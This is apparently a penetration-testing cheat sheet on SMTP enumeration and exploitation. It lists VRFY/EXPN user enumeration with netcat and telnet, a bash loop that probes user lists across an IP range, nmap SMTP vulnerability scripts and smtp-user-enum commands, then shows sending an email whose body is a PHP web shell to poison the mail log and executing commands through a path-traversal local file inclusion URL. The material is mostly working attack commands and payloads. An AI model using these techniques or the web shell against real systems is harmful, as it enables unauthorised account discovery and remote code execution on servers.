SMTP Enum
- Check for version
- LFI chaining log file poisoning
- User enumeration
nc -nv 10.11.12.8 25
VRFY bob
250 2.1.5
[email protected] <--- Output if user exists
VRFY idontexist
550 5.1.1 idontexist... User unknow <--- Output if user does not exist
EXPN request: asks the server for the membership of a mailing list
#!/bin/bash
# VRFY Script
#############
for ips in $(cat numbers.txt); # numbers.txt list of IP's
do
for user in $(cat users.txt); # users.txt list of usernames
do
echo VRFY $user | nc -nv -w 1 10.11.1.$ips 25 2>/dev/null |grep ^"250"
done
done
nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1
smtp-user-enum -M VRFY -D domain.here -u username -t 10.10.10.10
smtp-user-enum -M VRFY -U usernamelist.txt -t 10.10.10.10
telnet 10.10.10.10 25
EHLO sub.somedomain.com
VRFY username@localhost
mail from:[email protected]
rcpt to: username@localhost
data
Subject: Some Subject
<?php echo system($_REQUEST['cmd']); ?>
.
=================================================
After this and on the LFI you have discovered just place the variable cmd:
?cmd=id
&cmd=id
Examples:
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/mail.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/mail.log&cmd=whoami
Last modified 2yr ago